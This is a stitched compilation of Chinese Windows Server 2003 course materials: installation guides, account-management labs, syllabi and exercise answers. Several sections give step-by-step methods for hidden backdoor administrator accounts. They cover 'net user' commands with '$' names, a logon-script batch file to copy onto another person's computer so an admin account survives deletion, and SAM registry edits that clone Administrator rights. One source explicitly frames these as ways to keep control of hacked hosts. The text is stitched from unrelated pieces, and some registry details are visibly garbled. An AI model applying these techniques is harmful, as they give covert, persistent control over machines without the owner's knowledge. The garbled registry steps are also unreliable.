第二章补充实训二__Windows_Server_2003下创建永远的隐藏帐户
windows server 2003实训报告书
Server2003 实训报告书班级:11网络技术姓名:刘少兵指导老师:汪海威日期:6月15号Windows 2003安装教程一、准备工作:1.准备好Windows Server 2003 Standard Edition简体中文标准版版镜像文件。
二、用镜像启动系统:(如果你已经知道方法请转到下一步)重新启动系统并把光驱设为第一启动盘,保存设置并重启。
将2003安装光盘放入光驱,重新启动电脑。
刚启动时,当出现如下图1所示时快速按下回车键,否则不能启动2003系统安装。
三、安装Windows Server 2003光盘自启动后,如无意外即可见到安装界面。
从光盘读取启动信息,很快出现如下图所示。
全中文提示,“要现在安装Windows,请按ENTER”,按回车键。
错误!未找到目录项。
许可协议,这里没有选择的余地,按“F8”。
这里用“向下或向上”方向键选择安装系统所用的分区,我这里准备用C盘安装2003,并准备在下面的过程中格式化C盘。
选择好分区后按“Enter”键回车,安装程序将检查C盘的空间和C盘现有的操作系统。
上图表示安装程序检测到C盘已经有操作系统存在,提出警告信息。
如果你选择安装系统的分区是空的。
在这里我坚持用C盘安装系统,根据提示按下键盘上的“C”键后出现如下图所示。
上图最下方提供了5个对所选分区进行操作的选项,其中“保存现有文件系统(无变化)”的选项不含格式化分区操作,其它都会有对分区进行格式化的操作。
这里,我用“上移”箭头键选择“用NTFS文件系统格式化磁盘分区”。
回车后出现格式化C盘的警告。
确定要格式化C盘后,按“F”键,安装程序将开始格式化C盘,格式化过程如下图所示。
只有用光盘启动安装程序,才能在安装过程中提供格式化分区选项;如果用MS-DOS启动盘启动进入DOS下,运行i386winnt.exe进行安装时,安装Windows 2003过程没有格式化分区选项。
格式化C分区完成后,创建要复制的文件列表,跟接着开始复制系统文件。
《Windows server 2003管理》实训大纲
《Windows Server 2003管理》实训大纲
一、实训目的
本课程实践性强,为了加强工程实践,配合教学,安排课程设计,培养学生实际操作的能力,要求独立操作,熟练使用Windows server 2003网络操作系统的基本管理方法。
二、实训要求
通过一周的Windows Server 2003管理课程设计,学生应能针对小型网络进行管理,达到以下目标:
1、学会Windows Server 2003的安装,掌握不同版本的安装方法。
2、掌握本地用户帐户和域用户帐户的创建和管理
3、掌握域控制器的管理
4、掌握域安全策略的设置
5、掌握磁盘配额和脱机文件
6、掌握基本磁盘和动态磁盘之间的相互转换,理解各种卷的特点
7、掌握打印机的添加和管理
三、考核办法
每人独立完成所有实训项目,将个人所做的各项设置在学生机上保存,并完成各个实验的课程设计报告。
学生的保存设置和课程设计报告各占50%,并在期末考试中记入总成绩。
制订人:梁秀清
1。
实训项目二
实训项目二 Windows Server 2003 本地用户账户、组创建与管理本章实训环境和条件安装了Windows Server 2003 操作系统的计算机。
实验原理:Windows Server 2003 拥有一个完备的系统账户和安全、稳定的工作环境,可以很好地解决用户账户管理机制这样的安全问题。
系统管理员根据不同用户的具体使用情况,设立不同的用户账户,指派不同用户以不同的权限。
用户只有通过某个账户才能登录到计算机,并且只能拥有共享资源的使用权。
实验基本描述:本实验在VM ware虚拟机上对本地用户账户、组创建与管理以及本地用户的安全管理进行了实验,实验结果很好的验证了教学中所学的知识。
实训1:Windows Server 2003 本地用户账户创建与管理(1) 实训目的:熟练掌握Windows Server 2003 本地用户账户的创建与管理方法。
(2) 实训内容①选择“开始|管理工具|计算机管理”,打开如图2.19 所示的“计算机管理”窗口。
②通过计算机管理控制台添加本地账户MyUser1、MyUser2、MyUser3。
在创建时分别为3 个用户选择不同的用户账户密码选项。
③用不同的用户账户登录系统。
④删除用户账户MyUser3。
实训2:Windows Server 2003 组账户的创建与管理(1) 实训目的:熟练掌握Windows Server 2003 组账户的创建与管理方法。
(2) 实训内容①从“计算机管理”控制台中展开“本地用户和组”,用鼠标右键单击“组”按钮,选择“新建组”命令,打开如图2.20 所示的“新建组”对话框。
②创建组MyGroup1 和MyGroup2。
③将实训1 中创建的用户账户MyUser1 加入到组MyGroup1 和MyGroup2 中,MyUser2 加入到Administrators 组中。
④将MyGroup2 重命名为MyGroup3,将MyUser1 从中移除。
建立隐藏帐户方法
服务器建立超级隐藏账号方法来源:互联网作者:佚名时间:04-01 00:58:47【大中小】当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。
在肉鸡上建立一个隐藏的账户,以备需要的时候使用。
账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行揭密。
在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统中已经存在的账户。
在系统中可以进入“命令提示符”,控制面板的“计算机管理”,“注册表” 中对存在的账户进行查看,而管理员一般只在“命令提示符”和“计算机管理”中检查是否有异常,因此如何让系统账户在这两者中隐藏将是本文的重点。
一、“命令提示符”中的阴谋其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。
点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入net user chun$ password /addnet localgroup administrators chun$ /add这样我们就利用“命令提示符”成功得建立了一个用户名为“chun$”,密码为“password”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。
我们来看看隐藏账户的建立是否成功。
在“命令提示符”中输入查看系统账户的命令“net u ser”,回车后会显示当前系统中存在的账户。
从返回的结果中我们可以看到刚才我们建立的“chun$”这个账户并不存在。
接着让我们进入控制面板的“管理工具”,打开其中的“计算机”,查看其中的“本地用户和组”,在“用户”一项中,我们建立的隐藏账户“chun$”暴露无疑。
可以总结得出的结论是:这种方法只能将账户在“命令提示符”中进行隐藏,而对于“计算机管理”则无能为力。
网络系统管理WindowsServer2003实训篇第二版教学设计
网络系统管理 Windows Server 2003 实训篇第二版教学设计一、教学目标本实训旨在帮助学生掌握以下技能:•理解和掌握 Windows Server 2003 系统的安装、配置和管理方法;•掌握网络系统管理的基本原理、技术和方法;•培养学生实际操作的能力,让其能够顺利地完成各种网络系统管理任务。
二、教学内容1. Windows Server 2003 系统的安装和配置•系统的安装准备工作;•系统安装及常见问题的解决方法;•系统安装后的配置;•系统补丁和更新的安装;•常见系统问题的解决方法。
2. 网络系统管理基础•网络系统管理的基本概念和原理;•网络系统管理的工具和方法;•网络系统的基本安全管理;•网络故障排除和维修。
3. Windows Server 2003 系统的基本管理•系统配置的管理;•用户和组的管理;•文件系统和共享资源的管理;•远程访问和远程管理的配置;•常见问题的解决方法。
4. 高级网络管理•Active Directory 服务的安装和配置;•DNS 和 DHCP 服务的管理;•IIS 服务的安装和管理;•网络安全和访问控制;•网络监控和性能优化。
三、教学方法本实训采用以下教学方法:•理论讲解(40%):通过讲解幻灯片、视频、实例等形式介绍系统安装和配置的基本要点、网络系统管理的概念和原理、常见问题解决方法等内容;•练习操作(30%):通过实际模拟操作,例如系统安装、配置、管理等,让学生掌握操作技巧和方法;•自主学习(20%):鼓励学生自主学习,通过阅读相关文献、查阅网上信息等方式深入了解相关知识;•课程设计(10%):通过小组或个人开展实际应用项目设计,培养学生的创新思维和实践能力。
四、教学评估本实训的评估方式包括以下几种:•学生的操作综合评估,包括安装、配置、管理等方面;•课堂或小组讨论成果的评估;•课程设计成果的评估;•学生自主学习情况的评估。
五、教学资源本实训所需资源包括以下方面:•讲解材料:PPT、PDF、Word 等;•模拟系统环境和实验设备:可以使用虚拟机进行模拟操作;•参考书籍和资料:可以建议学生阅读相关书籍和文献,如。
服务器2003添加隐藏账号和检查删除隐藏账号教程
服务器添加隐藏账号和检查删除隐藏账号的方法一.建立一个别人永远删不掉的管理员用户操作步骤:1、在自己电脑里面建立一个.txt文本文件.2、在里面输入内容@echo offnet user yixiao 123456 /add 注释:前面yixiao是用户名后面123456是密码;net localgroup administrators yixiao /add3、把这个文件保存,更改后缀为yixiao.bat 注释:前面名字随便,后面格式一定要是bat;4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon 文件目录下,没有的话自己创建。
完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!如果把里面的内容改成@echo offnet user administrator 123456 /add意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456。
二.俺认为上述的方法并不理想,可以用隐藏帐号方法来建帐号会更好。
操作步骤:1、首先建立一个帐号结尾要带$号 ,如果yixiao$ ,密码自己随便,然后把帐号删除.2、将以下代码保存成(.reg)注册表形式代码如下:-------------------------------------------------------------------------------Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\names\yixiao$]@=hex(1f4):-------------------------------------------------------------------------------说明:1f4是Administrator帐号十六进制的值3、保存好后导入,然后用CMD命令设置密码net user yixiao$ 123456这样一个隐形帐号就建立好了,用户在“本地用户和组”内根本无法看到这个帐号。
WINDOWS SERVER2003实训指导书
》SERVER2003》《WINDOWS SERVER2003实训指导书实训一安装Windows Server2003企业版实训二Windows Server2003的基本配置实训三Windows Server2003的硬件管理实训四Windows Server2003的管理工具实训五安装、管理Active Directory实训六系统帐户管理实训七组策略实训八文件资源的管理与共享实训九创建、管理DFS根目录实训十磁盘管理实训十一:创建和管理Internet信息服务器实训十二:创建与管理DNS服务器实训十三:创建与管理DHCP服务器实训十四:网络监视与性能优化实训十五:网络打印服务实训一安装Windows Server2003企业版一、实训目的掌握安装Windows Server2003操作系统,并进行相应配置二、实训环境无操作系统计算机三、实训内容及步骤:1、Windows Server2003操作系统的安装2、Windows Server2003的配置四、实训过程1、直接用启动软盘或用Windows Server2003光盘启动微机,进行安装Windows Server2003操作系统。
操作步骤如下:(1)将Windows Server2003的光盘插入光驱中,启动计算机。
(2)按照安装提示,继续进行。
(3)为Windows Server2003选择或创建一个分区。
(4)选择区域设置。
(5)输入计算机名称。
(6)设置管理员密码。
(7)选择Windows Server2003组件。
(8)设置日期和时间。
(9)设置网络选项。
①如果允许Windows Server2003安装程序分配或获得IP地址,则在[网络设置]对话框中,单击[典型设置]。
Windows Server2003安装程序将检查域中是否有DHCP服务器,则该服务器会提供IP地址。
如果域内没有DHCP服务器,自动专用IP地址寻址功能会自动为这台计算机分配一个IP地址。
实验二 Windows Server 2003本地账户管理
例:某 Web服务器的账户设置一般访问人员:不限(Everyone)管理员 2 人:A1 和 A1组:Administrators用户账户:Administrator:只允许本地登录;拥有者:A1A1:允许本地登录和网络访问;拥有者:A1A2:允许本地登录和网络访问;拥有者:A2网络中心工作人员 2 人:B1 和 B2组:Power Users用户账户:B1:允许本地登录和网络访问;拥有者:B1B2:允许本地登录和网络访问;拥有者:B2网站维护人员 5 人:C1、C2、C3、C4、C5组:Remote Desktop Users权限:允许网络登录(FTP)用户账户:C1:计算机系网站维护员,拥有者:C1C2:物理系网站维护员,拥有者:C2C3:数学系网站维护员,拥有者:C3C4:化学系网站维护员,拥有者:C4C5:学院办公室网站维护员,拥有者:C5密码策略:启用密码复杂性要求,密码最短长度为 6,密码永不过期。
账户锁定策略:账户锁定阈值为 5 次;账户锁定时间为 20 分钟。
提示:完成后,请清理各个账户和设置,以保证不影响下一组人员的实验。
六、思考题:1、登录时,用户名是否区分大小写?密码是否区分大小写?答:用户名不区分大小写,密码是区分大小写2、当启用了“密码必须符合复杂性要求”后,如果现有账户使用了简单密码或空密码,是否需要立即更改?答:不需要3、账户锁定与账户禁用有什么区别?答:禁用帐户是管理员手动设置的,而帐户锁定有可能是用户自己或别人误输入密码或恶意试探密码造成的。
七、实验心得本次实验使我们更加了解了Windows Server 2003系统对本地账户的管理,其中包括建立用户账户实验、组账户实验及本地安全策略实验等。
当Windows Server 2003工作在“工作组”模式下或者作为域中的成员服务器时,在计算机操作系统中存在的是本地用户和本地组。
本地用户账户的作用范围仅限于在创建该账户的计算机上,以控制用户对该计算机上的资源的访问。
Windows_Server_2003域及其帐户管理
三、成员计算机 域建立后,只有那些加入到域中的计算机才能用来访问域中的资源,这些计算 机是成员计算机。 成员计算机的计算机全名:计算机名.域名 如:一台计算机名字为A,当它加入 jsj.local 域后,它的全名变为 A.jsj.local。
四、DNS服务器 在网络中访问计算机时使用的地址是IP地址。当我们用计算机名访问成员计 算机时,需要先通过DNS服务器把计算机名转换为IP地址再访问。
内置的域用户帐户:
Administrator(管理员):该帐户具有对域的完全控制权。它同时是 Administrators、Domain Admins 等多个内置组的成员。 Guest(来宾):该帐户只有极有限的权利。默认是禁用的。它是 Guests组和 Domain Guests组的成员。 内置用户账户可以重命名或禁用,但不能删除。
一、计算机账户
创建计算机账户的过程就是将一台计算机加入到域中的过程。 只有域管理员组的成员有权将一台计算机加入域中。
准备工作: 在准备加入域的计算机上,把它的DNS服务器地址设置为该域使用的DNS服务器 地址。
把计算机加入域:
方法一:在欲加入域的计算机上打开“我的电脑”属性,在“计算机名”选项 卡中用“更改”按钮把该计算机加入域。 注意:加入时会要求输入用户名和密码,这里必须输入管理员的用户名和密码。
域用户帐户的使用
在一台域成员计算机上登录,在登录界面上输入帐户名和密码,并选 择要登录的域。
域用户帐户属性的设置
在活动目录中,双击用户名或单击右键选择“属性”。
常规选项卡
设置该帐户的详细说明信息。
账户选项卡
修改帐户的登录名、登录选 项、密码选项、帐户期限等。
登录时间限制
默认为不限制,本例设置为只允许星期一至星期五的7:00~19:00登 录。
Windows Server 2003实训报告书(我的)
Windows Server 2003实训指导书Windows Server 2003实训指导书一、实训目的和要求目的:培养学生的动手能力,提高学生运用windows server 2003搭建应用服务器的能力,掌握windows server 2003关键技术的使用。
要求:掌握windows server 2003域模式的设计,E-MAIL、WEB服务器以及DNS、FTP 等服务器的正确配置及网络环境设计。
二、实训方式学生上机操作,教师指导。
三、实训报告要求认真填写实习鉴定表和实训报告,实训报告格式参照《实训报告规范格式》。
四、考核标准学生的实训成绩采用等级制,即:优:实训项目都完成无误,实训报告书写工整,无迟到早退现象。
良:实训项目基本完成,实训报告书写工整,无迟到早退现象五、实训内容1.场景描述现有一个单位,需要搭建一个网络环境。
具体如下:需要构建一web网站,提高对外形象宣传;内部搭建一个DNS服务器,提供对WEB站点的域名解析和对企业邮件服务器的域名解析。
单位计算机使用基于域模式的访问方式,每个职工按照其所属的部门分配不同的用户名和密码。
为了方便内部职工使用E-MAIL,单位搭建了一个E-MAIL服务器,给每个员工分配一个邮箱地址。
搭建一个FTP服务器,提供一个公共的文件交换平台和私有的网络硬盘。
2.具体要求●规划该单位网络环境。
●合理设计各台服务器的IP地址,正确安装相应windows组件和服务。
●WEB服务器首页要求包含学生的姓名、学号和专业班级,其它内容不限,可以自由发挥。
●搭建服务器,完成相关配置。
●进行调测,完成该企业需求。
●写出实训报告,报告中要写明详细的规划(包括网络拓扑结构,各服务器的配置和参数(提供截图),以及对各台服务器的测试界面截图等)。
严禁报告雷同,否则成绩按零分计。
报告要求详细的文字说明,不能只是相关的屏幕截图。
●三个人为一个单位进行实训。
●可以上网进行相关信息查询。
08679 Windows Server 2003网络管理项目实训教程习题参考答案
Windows Server 2003网络管理项目实训教程习题参考答案:项目1 Windows Server 2003安装与配置一、填空题1.Windows Server 2003 标准版、Windows Server 2003 企业版、Windows Server 2003Datacenter 版和 Windows Server 2003 Web 版。
2.NTFS 。
3.administrator。
4.support\tools\deploy.cab\setupmgr.exe 。
5.unattend。
6.Ctrl+Alt+delete。
二、选择题1.B2.A3.A4.A BC5.ABD三、思考题1. Windows Server 2003有哪些版本,它们的用途分别是什么?Windows Server 2003有四个版本,分别为Windows Server 2003 标准版、Windows Server 2003 企业版、Windows Server 2003 Datacenter 版和 Windows Server 2003 Web 版。
1)Windows Server 2003 标准版:◆支持文件和打印机共享。
◆提供安全的 Internet 连接。
◆允许集中化的桌面应用程序部署。
2)Windows Server 2003 企业版:◆是一种全功能的服务器操作系统,支持多达 8 个处理器。
◆提供企业级功能,如 8 节点群集、支持高达 32 GB 内存等。
◆可用于基于 Intel Itanium 系列的计算机。
◆将可用于能够支持 8 个处理器和 64 GB RAM 的 64 位计算平台。
3)Windows Server 2003 Datacenter 版◆是 Microsoft 迄今为止开发的功能最强大的服务器操作系统。
◆支持高达 32 路的 SMP 和 64 GB 的 RAM。
◆提供 8 节点群集和负载平衡服务是它的标准功能。
实验二 Windows2003系统安全
实验二 Windows2003系统安全任务用户权限管理【实验目的】●了解SID●掌握权限基本原则及设置方法●掌握磁盘配额设置方法【实验人数】每组1人【系统环境】Windows【网络环境】交换网络结构【实验工具】无【实验步骤】本练习单人为一组。
首先使用“快照X”恢复Windows系统环境。
1. SID查看(1)控制台中输入命令行:Whoami/user2.权限的四项基本原则演示1).拒绝优先原则(1)创建新用户右键点击我的电脑,选择管理,然后选择系统工具|本地用户和组|用户,右键选择“新用户”。
在弹出的新用户对话框中,填写用户名test,并设置“密码永不过期”。
单击“创建”按钮创建用户。
(2)创建组右键单击本地用户和组|组,选择“新建组”。
在弹出的对话框中新建组A、B,并将刚刚新建的test用户添加到组中。
(3)在本地磁盘C中新建名为test的文件夹,在里面新建文本文件test.txt,内容任意。
「说明」本地磁盘D为FAT32文件系统,此种文件系统不支持文件或目录权限设置,也不支持磁盘配额设置。
(4)右键单击test.txt文件,选择“属性”,在“安全”选项卡中,单击“添加”按钮,将包含test用户的组A、B添加进来,将组A的权限设置成“允许完全控制”,组B 的权限设置成“拒绝读取”。
(5)注销当前用户,使用新建的test用户登录,进入本地磁盘C:\test目录,访问test文件。
访问结果。
2).权限最小原则(1)注销当前用户,使用administrator用户登录系统,新建用户test2,默认情况下用户test2隶属组为:。
(2)注销当前用户,使用test2用户登录系统,进入C:\WINDOWS系统目录,尝试修改其中的文件,操作结果:。
3).权限继承原则(1)注销当前用户,使用administrator用户登录系统,新建用户test31、test32。
(2)在本地磁盘C中新建名为test3的文件夹,将其权限设置成对test31用户完全控制,test32用户只可以读取。
Windows server 2003网络操作系统实训文档
网络技术应用网档企业网络技术完美解决方案,一.综合实训目标综合实训引用虚拟机建立的网络环境来完成网络操作系统的实训具体为:在WINDOWS XP操作系统,使用VMWARE WORKSTATION建立网络环境,在虚拟机核物理PC之间或虚拟机之间使用桥接的方式,服务器安装和配置WINDOWS SERVER 2003企业版,利用虚拟机建立的网络环境和硬件配置,使用WINDOWS SERVER 2003企业版完善的网络功能,对网络操作系统进行相关的安装和配置,调试和测试,以完成对网络操作系统的综合实训,教深刻的理解网络系统的目的。
能够熟练掌握安装WINDOWS SERVER 2003服务器的方法熟练掌握WINDOW Sserver 2003对等网的配置和基本的网络命令熟练掌握创建和配置后动目录,管理域用户和组账户等掌握DNS的安装与配置熟练掌握DHCP服务器的安装与配置熟练掌握IIS服务器的安装与配置熟练掌握基本磁盘和配置,管理动态磁盘,备份和还原数据二.综合实训环境在已建好的10/100BASET网络,在虚拟机中进行实训计算机配置:CUP为INTEL PENTIUM 4以上,内存不小于256MB,硬盘不小于2GB,有光驱。
DHCP实训环境:1.硬件环境:服务器一台,测试用PC至少一台交换机或集线器一台,直线双绞线(视连接计算机而定)三.综合实训规划设计和技术方法规划与设计1.虚拟机的安装和配置,WINDOWSSERVER2003的安装和配置2.WINDOWSSERVER2003对等网的配置,和基本的网络命令3.创建和配置后动目录,管理域用户和计算机账户,管理域中的组账户4.安装DNS服务器,配置和管理DNS服务器,测试DNS服务器5.安装DHCP服务器,配置和管理DHCP服务器,配置DHCP客户端,测试DHCP服务器6.安装IIS6.0,配置和管理web网站,测试web网站7.管理基本磁盘,管理动态磁盘,备份和还原数据2.设置参数IP地址池:192.168.111.10-192.168.111.200,子网掩码:255.255.255.0默认网卡:192.168.111.1,DNS服务器:192.168.111.254保留地址:192.168.111.101,排除地址:192.168.111.20-192.168.111.26服务器一台,测试用PC至少一台,直线双绞线技术和方法:综合实训引用虚拟机建立的网络环境来完成网络操作系统的实训具体为:在WINDOWS XP操作系统,使用VMWARE WORKSTATION建立网络环境,在虚拟机核物理PC之间或虚拟机之间使用桥接的方式,服务器安装和配置WINDOWS SERVER 2003企业版,利用虚拟机建立的网络环境和硬件配置,使用WINDOWS SERVER 2003企业版完善的网络功能,对网络操作系统进行相关的安装和配置,调试和测试,以完成对网络操作系统的综合实训,大道教深刻的理解网络系统的目的。
WindowsServer2003网络管理员完全手册
在Windows Server 2003 操作系统中,每一个使用者都必须有一个账户,才能登录到计算机和服务器,并且访问网络上的资源。
Windows Server 2003所支持的用户账户分为两种类型:本地用户账户和域用户账户。
而组账户在域和其他环境下有很大的不同。
4.1 本地用户账户的管理当Windows Server 2003工作在“工作组”模式下或者作为域中的成员服务器时,在计算机操作系统中存在的是本地用户和本地组。
本地用户账户的作用范围仅限于在创建该账户的计算机上,以控制用户对该计算机上的资源的访问。
所以当需要访问在“工作组”模式下的计算机时,必须在每一个需要访问的计算机上都有其本地账户。
其中本地账户都存储在%SystemRoot%\system32\config\Sam数据库中。
下面学习怎样管理Windows Server 2003的本地用户账户。
4.1.1 本地用户账户的创建案例:在成员服务器上创建本地用户启动计算机,以“Administrator”身份登录Windows Server 2003,然后右击“我的电脑”选择“管理”命令,如图4-1所示。
将出现计算机管理控制台,如图4-2所示。
通过打开“开始”菜单并执行“管理工具”→“计算机管理”命令,也能够打开如图4-2所示的计算机管理控制台。
实用文档图4-1图4-2在“计算机管理”控制台中,打开“本地用户和组”,并选择“用户”,将出现系统中现有的用户信息,如图4-2所示。
实用文档右击“用户”或在右侧的用户信息窗口中的空白位置右击,将弹出如图4-3所示的菜单。
在出现的菜单中选择“新用户”命令,将弹出创建新用户的对话框,如图4-4所示。
根据实际情况在该对话框中设置创建新用户的选项。
用户名:用户登录时使用的账户名,例如输入“xubinhui”。
全名:用户的全名,属于辅助性的描述信息,不影响系统的功能。
描述:对于所建用户账户的描述,方便管理员识别用户,不影响系统的功能。
Windows Server 2003综合实训二
Windows Server 2003综合实训二给一家外贸公司设计一个基于Windows Server 2003管理平台的网络建设方案。
该公司共租用了6层办公楼,所有10个业务部门都需要接入Internet。
按照网络工程的设计思路,完成该公司的设计方案及预算,要求:(1)规划1个网络管理中心,构建1个设备间,安装网络核心设备,使所有楼层的交换机上联到该设备间核心交换机上。
(2)按照网络布线工程要求,进行网络布线设计和施工。
(3)采购3台机架式(刀片式)服务器,安装Windows Server 2003网络操作系统,并分别安装Web服务器、FTP服务器和E-mail服务器,服务器安装在设备间服务器专用机柜上。
(4)画出整个网络结构拓扑图。
(5)根据所学的知识和技能,完成对3台服务器的以下配置:●主域控制器(服务器1):用于公司办公业务。
●备份域控制器(服务器2):提供WWW和FTP服务。
●备份域控制器(服务器3):对内提供E-mail服务。
(6)系统软件配置●网络操作系统:Windows Server 2003。
●邮件服务器:Exchange Server。
●代理服务器:MS Proxy Server。
●数据库系统:MSSQL Server 2000/2005。
(7)业务处理软件●财务软件。
●办公软件。
●网上交易系统(电子商务系统)。
(8)方案设计要求●传输介质用超5类双绞线。
●网络结构为星型或树型结构。
●选择位置较为接近中心点的房间作为网络管理中心机房,建立设备间,放置机柜、交换机、服务器和其他网络配线设备。
●中心交换机采用100Mb/s速率,采用超5类双绞线与接入层交换机相连。
●3台服务器采用光纤跳线或双绞线与核心交换机1000Mb/s端口相连。
●外部出口通过宽带接入Internet。
实验2_Windows2003操作系统安全
windows 2003操作系统安全
实验目的
通过实验掌握windows2003操作系统安全设置。
使用仪器
实验环境
一台计算机
Xp操作系统;vmware虚拟机;windows2003
实验内容
任务1.禁用Guest账户
任务2.管理员帐号改名
任务3.陷阱帐号
任务4.关闭默认共享
任务5.安全密码更改
任务6.默认权限
选项→TCP/IP筛选选项
打开TCP/IP筛选对话框→添加需要的TCP、UDP协议即可。
任务八关闭不必要的服务
设置→控制面板→管理工具→服务
服务项目→选择操作→停止
任务九“本地安全策略”设置,要去如下,并在“事件查看器”中查看
管理工具→本地安全设置→帐户策略(密码策略、帐户锁定策略)
本地策略(审核策略)”→用户权限分配→安全选项
打开审核策略是最基本的入侵检测方法。当未授权者对用户的系统进行某些方式入侵时,都会被安全审核记录。帐户的保护主要使用密码保护机制,为了避免密码被破解而被夺取或盗用,同城可采取诸如提高密码的破解难度、启用账户锁定策略等措施,因此设置本地安全策略是至关重要的。
使用IPSec的原因:保护IP数据包的内容、通过数据包筛选及受信任通讯的实施来防御网络攻击、以接收和发送为主
实验报告
组员1:
组员2:
撰写人:
实验时间:
组员1任务
任务一禁用Guest账户
任务二管理员帐号改名
任务三陷阱帐号
任务四关闭默认共享
任务五安全密码更
组员2任务
任务六任务默认权限
任务七关闭不必要的端口
任务八关闭不必要的服务
任务九“本地安全策略”设置,要去如下,并在“事件查看器”中查看
windows server 2003 实训报告
陕西国防工业职业技术学院
Windows Server实训报告
姓名:李娜
学号:
指导老师:
实验时间:
实验地点:网络实验室
成绩:
计算机教研室制
建立与用户并配置文件陕西国防工业职业技术学院SHAANXIINSTITUTE OF TECHNOLOGY
实验项目单
完成委派
实训2. 利用DHCP服务器自动分配IP地址(将虚拟机的网卡类型设置成host-only)
实训3. DNS服务器的配置和管理
实训4. Wins服务器的配置和管理
实训5.管理IIS 6
建立网站
配置虚拟目录
利用ip地址配置WEB服务器,利用端口号配置WEB服务器,利用主机头配置WEB服务器不同的端口
不同的ip
不同的主机头
FTP的消息设置
验证用户的身份
实际目录与虚拟目录
创建用户自己的FTP站点
匿名服务器的创建
文件的上传和下载
实训6. VPN服务,远程服务架设远程访问服务器
在客户端建立远程访问拨号。
建立隐藏远程桌面账户!!
建立隐藏远程桌面账户(隐藏入侵)!!20090516——环境:XP或者2003 SERVER.目标:以2003 SERVER为例,在2003 server中,建立一个隐藏的用户账户,获取管理员权限,并实现远程桌面连接。
步骤:1、给管理员注册表操作权限:regedit--HKEY_LOCAL_MACHINE\SAM\SAM--右击--权限--给予administraotors完全控制的权限。
2、在CDM命令下建立如下账户密码:net user managers$ 118 /add(用户名密码:managers$ 118)3、将账户添加到administrators(这里有S)组中。
命令如下:4、赋予administrator权限:关闭并重新打开注册表:regedit--HKEY_LOCAL_MACHINE\SAM\SAM\Domains\users下Names便可以找到managers$,看到其右边的键值,类型为:0X47F,对应注册表Names上面的USERS 目录最后一个键值:0000047F,单击0000047F,查看右边的F键值。
如图:(一句话来说,Nemes下一个用户对应一个权限User下。
通过Nemes下的用户名称的键值,找到该用户名在users目录下的权限键值)对managers$右击——到处改注册表。
,下一步,复制administrator的权限给managers$:找到names下第一个用户即administrator,通过查看右边的键值0X1F4,找到其在Users目录下的权限键值,000001F4,也就是users下第一个键值,复制000001F4右边F中的键值:(右边部分)如图:账户managers$已经加入administrators组,并且获得administrator权限。
找到刚刚说的,users下managers$的键值0000047F,右边对应F键值,并把刚刚复制的数据,复制到F键值中对应部分。
计算机网络技术专业《隐藏帐户建立实验》
课题
隐藏账户建立实验
课型
实际操作
教学
时间
第一周
教学地点
新培楼226
学时
2
教学
目标
学会在windows中建立隐藏账户
教学
重点
掌控用户组的操作
教学难点隐藏账户的具体操Fra bibliotek方法资料与
工具
电脑、虚拟机、windows操作系统
授课方式
理实一体
教学内容与教学过程设计
方法与时间
1.如何创立用户。右键【我的电脑】——【管理】——【本地用户和组】,右键【用户】,点击【新建】。创立用户wxwx,密码为123456如图一所示:
作业布置
5分钟
8.实验完毕,关闭虚拟机
图七
教学后记:在做这个实验之前已经讲解了很多关于这方面的理论知识,在做实际操作中,需要同学们更加仔细,细致,但是需要同学们多多操作,遇到了困难,也要想方法一步一步解决,所以需要同学们熟能生巧,多看,多做,多练。
理论讲授
20分钟
图一
2.导出注册表信息,选择开始——运行,在运行中输入regedit 翻开注册表信息->选择HKEY_LOCAL_MACHINE——SAM->右键选择下面的SAM选择权限,给完全控制权限。如图二所示:
教师演示
15分钟
图二
3.然后重新翻开注册表。找到[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names],我们翻开NAME在其中选择我们刚刚创立的用户,右键选择导出,图三表示:
图三
4.、然后在user中,看到有000003EB的目录,选择跟刚刚一样的〔3f0右键选择导出,然后关闭注册表。如图四;
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
第二章补充知识3
6、导入注册表的内容 用户xbx$帐号都彻底删除了,又怎样使用呢?紧接着把前面导出的
注册表中的“000001f4”、“000003f6”和“xbx$”这三项注册表值导
入到注册表中。 关闭原来打开的注册表,再次打开注册表:开始运行regedt32
打开注册表,然后分别导入刚才导出注册表的三项值:文件导入
第二章补充知识3
5、删除帐号
删除帐号前查看一下原来新建的隐藏xbx$帐号,命令:net user
xbx$,隐藏xbx$帐号信息如下图:
第二章补充知识3
接下来我们删除“xbx$”帐号,命令:net user xbx$
/del 。
第二章补充知识3
删除后用命令查看一下删除的结果,命令:net user xbx$,从下图可 以看得出没有找到指定的用户帐号,说明系统不存在xbx$帐号了。
第二章补充知识3
第二章Windows Server 2003
创建永远的隐藏帐户
任务1:创建测试用户帐号 任务2:创建隐藏用户帐号
第二章补充知识3
如果要想控制远端的计算机访问你的计算机,那就少不了隐藏用户帐 号的问题了,其实创建隐藏用户帐号还是比较简单的。刚创建的用户 帐号要稍等几秒钟才能够使用,实际上是创建的帐号在向系统保存相
可以使用该帐号登录计算机,并且具备管理员权限。
因为在前面已经对隐藏用户帐号 xbx$在注册表的类型中的“F”选 项复制了管理员Administrator帐 号的“F”选项值,因此通过隐藏用
户帐号xbx$登录后,就具备了管理
员权限。
第二章补充知识3
到此为止,隐藏用户帐号就操作完成了。但是对于隐藏用
第二章补充知识3
11、进入计算机管理本地用户和组用户test属性隶属于,
可以看到刚才创建的用户test所属组几是users普通用户组,如下图:
